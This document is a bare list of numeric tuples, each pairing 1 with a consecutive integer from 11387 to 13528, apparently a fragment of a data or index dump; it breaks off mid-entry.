(1, 11387), (1, 11388), (1, 11389), (1, 11390), (1, 11391), (1, 11392), (1, 11393), (1, 11394), (1, 11395), (1, 11396), (1, 11397), (1, 11398), (1, 11399), (1, 11400), (1, 11401), (1, 11402), (1, 11403), (1, 11404), (1, 11405), (1, 11406), (1, 11407), (1, 11408), (1, 11409), (1, 11410), (1, 11411), (1, 11412), (1, 11413), (1, 11414), (1, 11415), (1, 11416), (1, 11417), (1, 11418), (1, 11419), (1, 11420), (1, 11421), (1, 11422), (1, 11423), (1, 11424), (1, 11425), (1, 11426), (1, 11427), (1, 11428), (1, 11429), (1, 11430), (1, 11431), (1, 11432), (1, 11433), (1, 11434), (1, 11435), (1, 11436), (1, 11437), (1, 11438), (1, 11439), (1, 11440), (1, 11441), (1, 11442), (1, 11443), (1, 11444), (1, 11445), (1, 11446), (1, 11447), (1, 11448), (1, 11449), (1, 11450), (1, 11451), (1, 11452), (1, 11453), (1, 11454), (1, 11455), (1, 11456), (1, 11457), (1, 11458), (1, 11459), (1, 11460), (1, 11461), (1, 11462), (1, 11463), (1, 11464), (1, 11465), (1, 11466), (1, 11467), (1, 11468), (1, 11469), (1, 11470), (1, 11471), (1, 11472), (1, 11473), (1, 11474), (1, 11475), (1, 11476), (1, 11477), (1, 11478), (1, 11479), (1, 11480), (1, 11481), (1, 11482), (1, 11483), (1, 11484), (1, 11485), (1, 11486), (1, 11487), (1, 11488), (1, 11489), (1, 11490), (1, 11491), (1, 11492), (1, 11493), (1, 11494), (1, 11495), (1, 11496), (1, 11497), (1, 11498), (1, 11499), (1, 11500), (1, 11501), (1, 11502), (1, 11503), (1, 11504), (1, 11505), (1, 11506), (1, 11507), (1, 11508), (1, 11509), (1, 11510), (1, 11511), (1, 11512), (1, 11513), (1, 11514), (1, 11515), (1, 11516), (1, 11517), (1, 11518), (1, 11519), (1, 11520), (1, 11521), (1, 11522), (1, 11523), (1, 11524), (1, 11525), (1, 11526), (1, 11527), (1, 11528), (1, 11529), (1, 11530), (1, 11531), (1, 11532), (1, 11533), (1, 11534), (1, 11535), (1, 11536), (1, 11537), (1, 11538), (1, 11539), (1, 11540), (1, 11541), (1, 11542), (1, 11543), (1, 11544), (1, 11545), (1, 11546), (1, 11547), (1, 11548), (1, 11549), (1, 11550), (1, 11551), (1, 11552), (1, 11553), (1, 11554), (1, 11555), (1, 11556), (1, 11557), (1, 11558), (1, 11559), (1, 11560), (1, 11561), (1, 11562), (1, 11563), (1, 11564), (1, 11565), (1, 11566), (1, 11567), (1, 11568), (1, 11569), (1, 11570), (1, 11571), (1, 11572), (1, 11573), (1, 11574), (1, 11575), (1, 11576), (1, 11577), (1, 11578), (1, 11579), (1, 11580), (1, 11581), (1, 11582), (1, 11583), (1, 11584), (1, 11585), (1, 11586), (1, 11587), (1, 11588), (1, 11589), (1, 11590), (1, 11591), (1, 11592), (1, 11593), (1, 11594), (1, 11595), (1, 11596), (1, 11597), (1, 11598), (1, 11599), (1, 11600), (1, 11601), (1, 11602), (1, 11603), (1, 11604), (1, 11605), (1, 11606), (1, 11607), (1, 11608), (1, 11609), (1, 11610), (1, 11611), (1, 11612), (1, 11613), (1, 11614), (1, 11615), (1, 11616), (1, 11617), (1, 11618), (1, 11619), (1, 11620), (1, 11621), (1, 11622), (1, 11623), (1, 11624), (1, 11625), (1, 11626), (1, 11627), (1, 11628), (1, 11629), (1, 11630), (1, 11631), (1, 11632), (1, 11633), (1, 11634), (1, 11635), (1, 11636), (1, 11637), (1, 11638), (1, 11639), (1, 11640), (1, 11641), (1, 11642), (1, 11643), (1, 11644), (1, 11645), (1, 11646), (1, 11647), (1, 11648), (1, 11649), (1, 11650), (1, 11651), (1, 11652), (1, 11653), (1, 11654), (1, 11655), (1, 11656), (1, 11657), (1, 11658), (1, 11659), (1, 11660), (1, 11661), (1, 11662), (1, 11663), (1, 11664), (1, 11665), (1, 11666), (1, 11667), (1, 11668), (1, 11669), (1, 11670), (1, 11671), (1, 11672), (1, 11673), (1, 11674), (1, 11675), (1, 11676), (1, 11677), (1, 11678), (1, 11679), (1, 11680), (1, 11681), (1, 11682), (1, 11683), (1, 11684), (1, 11685), (1, 11686), (1, 11687), (1, 11688), (1, 11689), (1, 11690), (1, 11691), (1, 11692), (1, 11693), (1, 11694), (1, 11695), (1, 11696), (1, 11697), (1, 11698), (1, 11699), (1, 11700), (1, 11701), (1, 11702), (1, 11703), (1, 11704), (1, 11705), (1, 11706), (1, 11707), (1, 11708), (1, 11709), (1, 11710), (1, 11711), (1, 11712), (1, 11713), (1, 11714), (1, 11715), (1, 11716), (1, 11717), (1, 11718), (1, 11719), (1, 11720), (1, 11721), (1, 11722), (1, 11723), (1, 11724), (1, 11725), (1, 11726), (1, 11727), (1, 11728), (1, 11729), (1, 11730), (1, 11731), (1, 11732), (1, 11733), (1, 11734), (1, 11735), (1, 11736), (1, 11737), (1, 11738), (1, 11739), (1, 11740), (1, 11741), (1, 11742), (1, 11743), (1, 11744), (1, 11745), (1, 11746), (1, 11747), (1, 11748), (1, 11749), (1, 11750), (1, 11751), (1, 11752), (1, 11753), (1, 11754), (1, 11755), (1, 11756), (1, 11757), (1, 11758), (1, 11759), (1, 11760), (1, 11761), (1, 11762), (1, 11763), (1, 11764), (1, 11765), (1, 11766), (1, 11767), (1, 11768), (1, 11769), (1, 11770), (1, 11771), (1, 11772), (1, 11773), (1, 11774), (1, 11775), (1, 11776), (1, 11777), (1, 11778), (1, 11779), (1, 11780), (1, 11781), (1, 11782), (1, 11783), (1, 11784), (1, 11785), (1, 11786), (1, 11787), (1, 11788), (1, 11789), (1, 11790), (1, 11791), (1, 11792), (1, 11793), (1, 11794), (1, 11795), (1, 11796), (1, 11797), (1, 11798), (1, 11799), (1, 11800), (1, 11801), (1, 11802), (1, 11803), (1, 11804), (1, 11805), (1, 11806), (1, 11807), (1, 11808), (1, 11809), (1, 11810), (1, 11811), (1, 11812), (1, 11813), (1, 11814), (1, 11815), (1, 11816), (1, 11817), (1, 11818), (1, 11819), (1, 11820), (1, 11821), (1, 11822), (1, 11823), (1, 11824), (1, 11825), (1, 11826), (1, 11827), (1, 11828), (1, 11829), (1, 11830), (1, 11831), (1, 11832), (1, 11833), (1, 11834), (1, 11835), (1, 11836), (1, 11837), (1, 11838), (1, 11839), (1, 11840), (1, 11841), (1, 11842), (1, 11843), (1, 11844), (1, 11845), (1, 11846), (1, 11847), (1, 11848), (1, 11849), (1, 11850), (1, 11851), (1, 11852), (1, 11853), (1, 11854), (1, 11855), (1, 11856), (1, 11857), (1, 11858), (1, 11859), (1, 11860), (1, 11861), (1, 11862), (1, 11863), (1, 11864), (1, 11865), (1, 11866), (1, 11867), (1, 11868), (1, 11869), (1, 11870), (1, 11871), (1, 11872), (1, 11873), (1, 11874), (1, 11875), (1, 11876), (1, 11877), (1, 11878), (1, 11879), (1, 11880), (1, 11881), (1, 11882), (1, 11883), (1, 11884), (1, 11885), (1, 11886), (1, 11887), (1, 11888), (1, 11889), (1, 11890), (1, 11891), (1, 11892), (1, 11893), (1, 11894), (1, 11895), (1, 11896), (1, 11897), (1, 11898), (1, 11899), (1, 11900), (1, 11901), (1, 11902), (1, 11903), (1, 11904), (1, 11905), (1, 11906), (1, 11907), (1, 11908), (1, 11909), (1, 11910), (1, 11911), (1, 11912), (1, 11913), (1, 11914), (1, 11915), (1, 11916), (1, 11917), (1, 11918), (1, 11919), (1, 11920), (1, 11921), (1, 11922), (1, 11923), (1, 11924), (1, 11925), (1, 11926), (1, 11927), (1, 11928), (1, 11929), (1, 11930), (1, 11931), (1, 11932), (1, 11933), (1, 11934), (1, 11935), (1, 11936), (1, 11937), (1, 11938), (1, 11939), (1, 11940), (1, 11941), (1, 11942), (1, 11943), (1, 11944), (1, 11945), (1, 11946), (1, 11947), (1, 11948), (1, 11949), (1, 11950), (1, 11951), (1, 11952), (1, 11953), (1, 11954), (1, 11955), (1, 11956), (1, 11957), (1, 11958), (1, 11959), (1, 11960), (1, 11961), (1, 11962), (1, 11963), (1, 11964), (1, 11965), (1, 11966), (1, 11967), (1, 11968), (1, 11969), (1, 11970), (1, 11971), (1, 11972), (1, 11973), (1, 11974), (1, 11975), (1, 11976), (1, 11977), (1, 11978), (1, 11979), (1, 11980), (1, 11981), (1, 11982), (1, 11983), (1, 11984), (1, 11985), (1, 11986), (1, 11987), (1, 11988), (1, 11989), (1, 11990), (1, 11991), (1, 11992), (1, 11993), (1, 11994), (1, 11995), (1, 11996), (1, 11997), (1, 11998), (1, 11999), (1, 12000), (1, 12001), (1, 12002), (1, 12003), (1, 12004), (1, 12005), (1, 12006), (1, 12007), (1, 12008), (1, 12009), (1, 12010), (1, 12011), (1, 12012), (1, 12013), (1, 12014), (1, 12015), (1, 12016), (1, 12017), (1, 12018), (1, 12019), (1, 12020), (1, 12021), (1, 12022), (1, 12023), (1, 12024), (1, 12025), (1, 12026), (1, 12027), (1, 12028), (1, 12029), (1, 12030), (1, 12031), (1, 12032), (1, 12033), (1, 12034), (1, 12035), (1, 12036), (1, 12037), (1, 12038), (1, 12039), (1, 12040), (1, 12041), (1, 12042), (1, 12043), (1, 12044), (1, 12045), (1, 12046), (1, 12047), (1, 12048), (1, 12049), (1, 12050), (1, 12051), (1, 12052), (1, 12053), (1, 12054), (1, 12055), (1, 12056), (1, 12057), (1, 12058), (1, 12059), (1, 12060), (1, 12061), (1, 12062), (1, 12063), (1, 12064), (1, 12065), (1, 12066), (1, 12067), (1, 12068), (1, 12069), (1, 12070), (1, 12071), (1, 12072), (1, 12073), (1, 12074), (1, 12075), (1, 12076), (1, 12077), (1, 12078), (1, 12079), (1, 12080), (1, 12081), (1, 12082), (1, 12083), (1, 12084), (1, 12085), (1, 12086), (1, 12087), (1, 12088), (1, 12089), (1, 12090), (1, 12091), (1, 12092), (1, 12093), (1, 12094), (1, 12095), (1, 12096), (1, 12097), (1, 12098), (1, 12099), (1, 12100), (1, 12101), (1, 12102), (1, 12103), (1, 12104), (1, 12105), (1, 12106), (1, 12107), (1, 12108), (1, 12109), (1, 12110), (1, 12111), (1, 12112), (1, 12113), (1, 12114), (1, 12115), (1, 12116), (1, 12117), (1, 12118), (1, 12119), (1, 12120), (1, 12121), (1, 12122), (1, 12123), (1, 12124), (1, 12125), (1, 12126), (1, 12127), (1, 12128), (1, 12129), (1, 12130), (1, 12131), (1, 12132), (1, 12133), (1, 12134), (1, 12135), (1, 12136), (1, 12137), (1, 12138), (1, 12139), (1, 12140), (1, 12141), (1, 12142), (1, 12143), (1, 12144), (1, 12145), (1, 12146), (1, 12147), (1, 12148), (1, 12149), (1, 12150), (1, 12151), (1, 12152), (1, 12153), (1, 12154), (1, 12155), (1, 12156), (1, 12157), (1, 12158), (1, 12159), (1, 12160), (1, 12161), (1, 12162), (1, 12163), (1, 12164), (1, 12165), (1, 12166), (1, 12167), (1, 12168), (1, 12169), (1, 12170), (1, 12171), (1, 12172), (1, 12173), (1, 12174), (1, 12175), (1, 12176), (1, 12177), (1, 12178), (1, 12179), (1, 12180), (1, 12181), (1, 12182), (1, 12183), (1, 12184), (1, 12185), (1, 12186), (1, 12187), (1, 12188), (1, 12189), (1, 12190), (1, 12191), (1, 12192), (1, 12193), (1, 12194), (1, 12195), (1, 12196), (1, 12197), (1, 12198), (1, 12199), (1, 12200), (1, 12201), (1, 12202), (1, 12203), (1, 12204), (1, 12205), (1, 12206), (1, 12207), (1, 12208), (1, 12209), (1, 12210), (1, 12211), (1, 12212), (1, 12213), (1, 12214), (1, 12215), (1, 12216), (1, 12217), (1, 12218), (1, 12219), (1, 12220), (1, 12221), (1, 12222), (1, 12223), (1, 12224), (1, 12225), (1, 12226), (1, 12227), (1, 12228), (1, 12229), (1, 12230), (1, 12231), (1, 12232), (1, 12233), (1, 12234), (1, 12235), (1, 12236), (1, 12237), (1, 12238), (1, 12239), (1, 12240), (1, 12241), (1, 12242), (1, 12243), (1, 12244), (1, 12245), (1, 12246), (1, 12247), (1, 12248), (1, 12249), (1, 12250), (1, 12251), (1, 12252), (1, 12253), (1, 12254), (1, 12255), (1, 12256), (1, 12257), (1, 12258), (1, 12259), (1, 12260), (1, 12261), (1, 12262), (1, 12263), (1, 12264), (1, 12265), (1, 12266), (1, 12267), (1, 12268), (1, 12269), (1, 12270), (1, 12271), (1, 12272), (1, 12273), (1, 12274), (1, 12275), (1, 12276), (1, 12277), (1, 12278), (1, 12279), (1, 12280), (1, 12281), (1, 12282), (1, 12283), (1, 12284), (1, 12285), (1, 12286), (1, 12287), (1, 12288), (1, 12289), (1, 12290), (1, 12291), (1, 12292), (1, 12293), (1, 12294), (1, 12295), (1, 12296), (1, 12297), (1, 12298), (1, 12299), (1, 12300), (1, 12301), (1, 12302), (1, 12303), (1, 12304), (1, 12305), (1, 12306), (1, 12307), (1, 12308), (1, 12309), (1, 12310), (1, 12311), (1, 12312), (1, 12313), (1, 12314), (1, 12315), (1, 12316), (1, 12317), (1, 12318), (1, 12319), (1, 12320), (1, 12321), (1, 12322), (1, 12323), (1, 12324), (1, 12325), (1, 12326), (1, 12327), (1, 12328), (1, 12329), (1, 12330), (1, 12331), (1, 12332), (1, 12333), (1, 12334), (1, 12335), (1, 12336), (1, 12337), (1, 12338), (1, 12339), (1, 12340), (1, 12341), (1, 12342), (1, 12343), (1, 12344), (1, 12345), (1, 12346), (1, 12347), (1, 12348), (1, 12349), (1, 12350), (1, 12351), (1, 12352), (1, 12353), (1, 12354), (1, 12355), (1, 12356), (1, 12357), (1, 12358), (1, 12359), (1, 12360), (1, 12361), (1, 12362), (1, 12363), (1, 12364), (1, 12365), (1, 12366), (1, 12367), (1, 12368), (1, 12369), (1, 12370), (1, 12371), (1, 12372), (1, 12373), (1, 12374), (1, 12375), (1, 12376), (1, 12377), (1, 12378), (1, 12379), (1, 12380), (1, 12381), (1, 12382), (1, 12383), (1, 12384), (1, 12385), (1, 12386), (1, 12387), (1, 12388), (1, 12389), (1, 12390), (1, 12391), (1, 12392), (1, 12393), (1, 12394), (1, 12395), (1, 12396), (1, 12397), (1, 12398), (1, 12399), (1, 12400), (1, 12401), (1, 12402), (1, 12403), (1, 12404), (1, 12405), (1, 12406), (1, 12407), (1, 12408), (1, 12409), (1, 12410), (1, 12411), (1, 12412), (1, 12413), (1, 12414), (1, 12415), (1, 12416), (1, 12417), (1, 12418), (1, 12419), (1, 12420), (1, 12421), (1, 12422), (1, 12423), (1, 12424), (1, 12425), (1, 12426), (1, 12427), (1, 12428), (1, 12429), (1, 12430), (1, 12431), (1, 12432), (1, 12433), (1, 12434), (1, 12435), (1, 12436), (1, 12437), (1, 12438), (1, 12439), (1, 12440), (1, 12441), (1, 12442), (1, 12443), (1, 12444), (1, 12445), (1, 12446), (1, 12447), (1, 12448), (1, 12449), (1, 12450), (1, 12451), (1, 12452), (1, 12453), (1, 12454), (1, 12455), (1, 12456), (1, 12457), (1, 12458), (1, 12459), (1, 12460), (1, 12461), (1, 12462), (1, 12463), (1, 12464), (1, 12465), (1, 12466), (1, 12467), (1, 12468), (1, 12469), (1, 12470), (1, 12471), (1, 12472), (1, 12473), (1, 12474), (1, 12475), (1, 12476), (1, 12477), (1, 12478), (1, 12479), (1, 12480), (1, 12481), (1, 12482), (1, 12483), (1, 12484), (1, 12485), (1, 12486), (1, 12487), (1, 12488), (1, 12489), (1, 12490), (1, 12491), (1, 12492), (1, 12493), (1, 12494), (1, 12495), (1, 12496), (1, 12497), (1, 12498), (1, 12499), (1, 12500), (1, 12501), (1, 12502), (1, 12503), (1, 12504), (1, 12505), (1, 12506), (1, 12507), (1, 12508), (1, 12509), (1, 12510), (1, 12511), (1, 12512), (1, 12513), (1, 12514), (1, 12515), (1, 12516), (1, 12517), (1, 12518), (1, 12519), (1, 12520), (1, 12521), (1, 12522), (1, 12523), (1, 12524), (1, 12525), (1, 12526), (1, 12527), (1, 12528), (1, 12529), (1, 12530), (1, 12531), (1, 12532), (1, 12533), (1, 12534), (1, 12535), (1, 12536), (1, 12537), (1, 12538), (1, 12539), (1, 12540), (1, 12541), (1, 12542), (1, 12543), (1, 12544), (1, 12545), (1, 12546), (1, 12547), (1, 12548), (1, 12549), (1, 12550), (1, 12551), (1, 12552), (1, 12553), (1, 12554), (1, 12555), (1, 12556), (1, 12557), (1, 12558), (1, 12559), (1, 12560), (1, 12561), (1, 12562), (1, 12563), (1, 12564), (1, 12565), (1, 12566), (1, 12567), (1, 12568), (1, 12569), (1, 12570), (1, 12571), (1, 12572), (1, 12573), (1, 12574), (1, 12575), (1, 12576), (1, 12577), (1, 12578), (1, 12579), (1, 12580), (1, 12581), (1, 12582), (1, 12583), (1, 12584), (1, 12585), (1, 12586), (1, 12587), (1, 12588), (1, 12589), (1, 12590), (1, 12591), (1, 12592), (1, 12593), (1, 12594), (1, 12595), (1, 12596), (1, 12597), (1, 12598), (1, 12599), (1, 12600), (1, 12601), (1, 12602), (1, 12603), (1, 12604), (1, 12605), (1, 12606), (1, 12607), (1, 12608), (1, 12609), (1, 12610), (1, 12611), (1, 12612), (1, 12613), (1, 12614), (1, 12615), (1, 12616), (1, 12617), (1, 12618), (1, 12619), (1, 12620), (1, 12621), (1, 12622), (1, 12623), (1, 12624), (1, 12625), (1, 12626), (1, 12627), (1, 12628), (1, 12629), (1, 12630), (1, 12631), (1, 12632), (1, 12633), (1, 12634), (1, 12635), (1, 12636), (1, 12637), (1, 12638), (1, 12639), (1, 12640), (1, 12641), (1, 12642), (1, 12643), (1, 12644), (1, 12645), (1, 12646), (1, 12647), (1, 12648), (1, 12649), (1, 12650), (1, 12651), (1, 12652), (1, 12653), (1, 12654), (1, 12655), (1, 12656), (1, 12657), (1, 12658), (1, 12659), (1, 12660), (1, 12661), (1, 12662), (1, 12663), (1, 12664), (1, 12665), (1, 12666), (1, 12667), (1, 12668), (1, 12669), (1, 12670), (1, 12671), (1, 12672), (1, 12673), (1, 12674), (1, 12675), (1, 12676), (1, 12677), (1, 12678), (1, 12679), (1, 12680), (1, 12681), (1, 12682), (1, 12683), (1, 12684), (1, 12685), (1, 12686), (1, 12687), (1, 12688), (1, 12689), (1, 12690), (1, 12691), (1, 12692), (1, 12693), (1, 12694), (1, 12695), (1, 12696), (1, 12697), (1, 12698), (1, 12699), (1, 12700), (1, 12701), (1, 12702), (1, 12703), (1, 12704), (1, 12705), (1, 12706), (1, 12707), (1, 12708), (1, 12709), (1, 12710), (1, 12711), (1, 12712), (1, 12713), (1, 12714), (1, 12715), (1, 12716), (1, 12717), (1, 12718), (1, 12719), (1, 12720), (1, 12721), (1, 12722), (1, 12723), (1, 12724), (1, 12725), (1, 12726), (1, 12727), (1, 12728), (1, 12729), (1, 12730), (1, 12731), (1, 12732), (1, 12733), (1, 12734), (1, 12735), (1, 12736), (1, 12737), (1, 12738), (1, 12739), (1, 12740), (1, 12741), (1, 12742), (1, 12743), (1, 12744), (1, 12745), (1, 12746), (1, 12747), (1, 12748), (1, 12749), (1, 12750), (1, 12751), (1, 12752), (1, 12753), (1, 12754), (1, 12755), (1, 12756), (1, 12757), (1, 12758), (1, 12759), (1, 12760), (1, 12761), (1, 12762), (1, 12763), (1, 12764), (1, 12765), (1, 12766), (1, 12767), (1, 12768), (1, 12769), (1, 12770), (1, 12771), (1, 12772), (1, 12773), (1, 12774), (1, 12775), (1, 12776), (1, 12777), (1, 12778), (1, 12779), (1, 12780), (1, 12781), (1, 12782), (1, 12783), (1, 12784), (1, 12785), (1, 12786), (1, 12787), (1, 12788), (1, 12789), (1, 12790), (1, 12791), (1, 12792), (1, 12793), (1, 12794), (1, 12795), (1, 12796), (1, 12797), (1, 12798), (1, 12799), (1, 12800), (1, 12801), (1, 12802), (1, 12803), (1, 12804), (1, 12805), (1, 12806), (1, 12807), (1, 12808), (1, 12809), (1, 12810), (1, 12811), (1, 12812), (1, 12813), (1, 12814), (1, 12815), (1, 12816), (1, 12817), (1, 12818), (1, 12819), (1, 12820), (1, 12821), (1, 12822), (1, 12823), (1, 12824), (1, 12825), (1, 12826), (1, 12827), (1, 12828), (1, 12829), (1, 12830), (1, 12831), (1, 12832), (1, 12833), (1, 12834), (1, 12835), (1, 12836), (1, 12837), (1, 12838), (1, 12839), (1, 12840), (1, 12841), (1, 12842), (1, 12843), (1, 12844), (1, 12845), (1, 12846), (1, 12847), (1, 12848), (1, 12849), (1, 12850), (1, 12851), (1, 12852), (1, 12853), (1, 12854), (1, 12855), (1, 12856), (1, 12857), (1, 12858), (1, 12859), (1, 12860), (1, 12861), (1, 12862), (1, 12863), (1, 12864), (1, 12865), (1, 12866), (1, 12867), (1, 12868), (1, 12869), (1, 12870), (1, 12871), (1, 12872), (1, 12873), (1, 12874), (1, 12875), (1, 12876), (1, 12877), (1, 12878), (1, 12879), (1, 12880), (1, 12881), (1, 12882), (1, 12883), (1, 12884), (1, 12885), (1, 12886), (1, 12887), (1, 12888), (1, 12889), (1, 12890), (1, 12891), (1, 12892), (1, 12893), (1, 12894), (1, 12895), (1, 12896), (1, 12897), (1, 12898), (1, 12899), (1, 12900), (1, 12901), (1, 12902), (1, 12903), (1, 12904), (1, 12905), (1, 12906), (1, 12907), (1, 12908), (1, 12909), (1, 12910), (1, 12911), (1, 12912), (1, 12913), (1, 12914), (1, 12915), (1, 12916), (1, 12917), (1, 12918), (1, 12919), (1, 12920), (1, 12921), (1, 12922), (1, 12923), (1, 12924), (1, 12925), (1, 12926), (1, 12927), (1, 12928), (1, 12929), (1, 12930), (1, 12931), (1, 12932), (1, 12933), (1, 12934), (1, 12935), (1, 12936), (1, 12937), (1, 12938), (1, 12939), (1, 12940), (1, 12941), (1, 12942), (1, 12943), (1, 12944), (1, 12945), (1, 12946), (1, 12947), (1, 12948), (1, 12949), (1, 12950), (1, 12951), (1, 12952), (1, 12953), (1, 12954), (1, 12955), (1, 12956), (1, 12957), (1, 12958), (1, 12959), (1, 12960), (1, 12961), (1, 12962), (1, 12963), (1, 12964), (1, 12965), (1, 12966), (1, 12967), (1, 12968), (1, 12969), (1, 12970), (1, 12971), (1, 12972), (1, 12973), (1, 12974), (1, 12975), (1, 12976), (1, 12977), (1, 12978), (1, 12979), (1, 12980), (1, 12981), (1, 12982), (1, 12983), (1, 12984), (1, 12985), (1, 12986), (1, 12987), (1, 12988), (1, 12989), (1, 12990), (1, 12991), (1, 12992), (1, 12993), (1, 12994), (1, 12995), (1, 12996), (1, 12997), (1, 12998), (1, 12999), (1, 13000), (1, 13001), (1, 13002), (1, 13003), (1, 13004), (1, 13005), (1, 13006), (1, 13007), (1, 13008), (1, 13009), (1, 13010), (1, 13011), (1, 13012), (1, 13013), (1, 13014), (1, 13015), (1, 13016), (1, 13017), (1, 13018), (1, 13019), (1, 13020), (1, 13021), (1, 13022), (1, 13023), (1, 13024), (1, 13025), (1, 13026), (1, 13027), (1, 13028), (1, 13029), (1, 13030), (1, 13031), (1, 13032), (1, 13033), (1, 13034), (1, 13035), (1, 13036), (1, 13037), (1, 13038), (1, 13039), (1, 13040), (1, 13041), (1, 13042), (1, 13043), (1, 13044), (1, 13045), (1, 13046), (1, 13047), (1, 13048), (1, 13049), (1, 13050), (1, 13051), (1, 13052), (1, 13053), (1, 13054), (1, 13055), (1, 13056), (1, 13057), (1, 13058), (1, 13059), (1, 13060), (1, 13061), (1, 13062), (1, 13063), (1, 13064), (1, 13065), (1, 13066), (1, 13067), (1, 13068), (1, 13069), (1, 13070), (1, 13071), (1, 13072), (1, 13073), (1, 13074), (1, 13075), (1, 13076), (1, 13077), (1, 13078), (1, 13079), (1, 13080), (1, 13081), (1, 13082), (1, 13083), (1, 13084), (1, 13085), (1, 13086), (1, 13087), (1, 13088), (1, 13089), (1, 13090), (1, 13091), (1, 13092), (1, 13093), (1, 13094), (1, 13095), (1, 13096), (1, 13097), (1, 13098), (1, 13099), (1, 13100), (1, 13101), (1, 13102), (1, 13103), (1, 13104), (1, 13105), (1, 13106), (1, 13107), (1, 13108), (1, 13109), (1, 13110), (1, 13111), (1, 13112), (1, 13113), (1, 13114), (1, 13115), (1, 13116), (1, 13117), (1, 13118), (1, 13119), (1, 13120), (1, 13121), (1, 13122), (1, 13123), (1, 13124), (1, 13125), (1, 13126), (1, 13127), (1, 13128), (1, 13129), (1, 13130), (1, 13131), (1, 13132), (1, 13133), (1, 13134), (1, 13135), (1, 13136), (1, 13137), (1, 13138), (1, 13139), (1, 13140), (1, 13141), (1, 13142), (1, 13143), (1, 13144), (1, 13145), (1, 13146), (1, 13147), (1, 13148), (1, 13149), (1, 13150), (1, 13151), (1, 13152), (1, 13153), (1, 13154), (1, 13155), (1, 13156), (1, 13157), (1, 13158), (1, 13159), (1, 13160), (1, 13161), (1, 13162), (1, 13163), (1, 13164), (1, 13165), (1, 13166), (1, 13167), (1, 13168), (1, 13169), (1, 13170), (1, 13171), (1, 13172), (1, 13173), (1, 13174), (1, 13175), (1, 13176), (1, 13177), (1, 13178), (1, 13179), (1, 13180), (1, 13181), (1, 13182), (1, 13183), (1, 13184), (1, 13185), (1, 13186), (1, 13187), (1, 13188), (1, 13189), (1, 13190), (1, 13191), (1, 13192), (1, 13193), (1, 13194), (1, 13195), (1, 13196), (1, 13197), (1, 13198), (1, 13199), (1, 13200), (1, 13201), (1, 13202), (1, 13203), (1, 13204), (1, 13205), (1, 13206), (1, 13207), (1, 13208), (1, 13209), (1, 13210), (1, 13211), (1, 13212), (1, 13213), (1, 13214), (1, 13215), (1, 13216), (1, 13217), (1, 13218), (1, 13219), (1, 13220), (1, 13221), (1, 13222), (1, 13223), (1, 13224), (1, 13225), (1, 13226), (1, 13227), (1, 13228), (1, 13229), (1, 13230), (1, 13231), (1, 13232), (1, 13233), (1, 13234), (1, 13235), (1, 13236), (1, 13237), (1, 13238), (1, 13239), (1, 13240), (1, 13241), (1, 13242), (1, 13243), (1, 13244), (1, 13245), (1, 13246), (1, 13247), (1, 13248), (1, 13249), (1, 13250), (1, 13251), (1, 13252), (1, 13253), (1, 13254), (1, 13255), (1, 13256), (1, 13257), (1, 13258), (1, 13259), (1, 13260), (1, 13261), (1, 13262), (1, 13263), (1, 13264), (1, 13265), (1, 13266), (1, 13267), (1, 13268), (1, 13269), (1, 13270), (1, 13271), (1, 13272), (1, 13273), (1, 13274), (1, 13275), (1, 13276), (1, 13277), (1, 13278), (1, 13279), (1, 13280), (1, 13281), (1, 13282), (1, 13283), (1, 13284), (1, 13285), (1, 13286), (1, 13287), (1, 13288), (1, 13289), (1, 13290), (1, 13291), (1, 13292), (1, 13293), (1, 13294), (1, 13295), (1, 13296), (1, 13297), (1, 13298), (1, 13299), (1, 13300), (1, 13301), (1, 13302), (1, 13303), (1, 13304), (1, 13305), (1, 13306), (1, 13307), (1, 13308), (1, 13309), (1, 13310), (1, 13311), (1, 13312), (1, 13313), (1, 13314), (1, 13315), (1, 13316), (1, 13317), (1, 13318), (1, 13319), (1, 13320), (1, 13321), (1, 13322), (1, 13323), (1, 13324), (1, 13325), (1, 13326), (1, 13327), (1, 13328), (1, 13329), (1, 13330), (1, 13331), (1, 13332), (1, 13333), (1, 13334), (1, 13335), (1, 13336), (1, 13337), (1, 13338), (1, 13339), (1, 13340), (1, 13341), (1, 13342), (1, 13343), (1, 13344), (1, 13345), (1, 13346), (1, 13347), (1, 13348), (1, 13349), (1, 13350), (1, 13351), (1, 13352), (1, 13353), (1, 13354), (1, 13355), (1, 13356), (1, 13357), (1, 13358), (1, 13359), (1, 13360), (1, 13361), (1, 13362), (1, 13363), (1, 13364), (1, 13365), (1, 13366), (1, 13367), (1, 13368), (1, 13369), (1, 13370), (1, 13371), (1, 13372), (1, 13373), (1, 13374), (1, 13375), (1, 13376), (1, 13377), (1, 13378), (1, 13379), (1, 13380), (1, 13381), (1, 13382), (1, 13383), (1, 13384), (1, 13385), (1, 13386), (1, 13387), (1, 13388), (1, 13389), (1, 13390), (1, 13391), (1, 13392), (1, 13393), (1, 13394), (1, 13395), (1, 13396), (1, 13397), (1, 13398), (1, 13399), (1, 13400), (1, 13401), (1, 13402), (1, 13403), (1, 13404), (1, 13405), (1, 13406), (1, 13407), (1, 13408), (1, 13409), (1, 13410), (1, 13411), (1, 13412), (1, 13413), (1, 13414), (1, 13415), (1, 13416), (1, 13417), (1, 13418), (1, 13419), (1, 13420), (1, 13421), (1, 13422), (1, 13423), (1, 13424), (1, 13425), (1, 13426), (1, 13427), (1, 13428), (1, 13429), (1, 13430), (1, 13431), (1, 13432), (1, 13433), (1, 13434), (1, 13435), (1, 13436), (1, 13437), (1, 13438), (1, 13439), (1, 13440), (1, 13441), (1, 13442), (1, 13443), (1, 13444), (1, 13445), (1, 13446), (1, 13447), (1, 13448), (1, 13449), (1, 13450), (1, 13451), (1, 13452), (1, 13453), (1, 13454), (1, 13455), (1, 13456), (1, 13457), (1, 13458), (1, 13459), (1, 13460), (1, 13461), (1, 13462), (1, 13463), (1, 13464), (1, 13465), (1, 13466), (1, 13467), (1, 13468), (1, 13469), (1, 13470), (1, 13471), (1, 13472), (1, 13473), (1, 13474), (1, 13475), (1, 13476), (1, 13477), (1, 13478), (1, 13479), (1, 13480), (1, 13481), (1, 13482), (1, 13483), (1, 13484), (1, 13485), (1, 13486), (1, 13487), (1, 13488), (1, 13489), (1, 13490), (1, 13491), (1, 13492), (1, 13493), (1, 13494), (1, 13495), (1, 13496), (1, 13497), (1, 13498), (1, 13499), (1, 13500), (1, 13501), (1, 13502), (1, 13503), (1, 13504), (1, 13505), (1, 13506), (1, 13507), (1, 13508), (1, 13509), (1, 13510), (1, 13511), (1, 13512), (1, 13513), (1, 13514), (1, 13515), (1, 13516), (1, 13517), (1, 13518), (1, 13519), (1, 13520), (1, 13521), (1, 13522), (1, 13523), (1, 13524), (1, 13525), (1, 13526), (1, 13527), (1, 13528), (1, 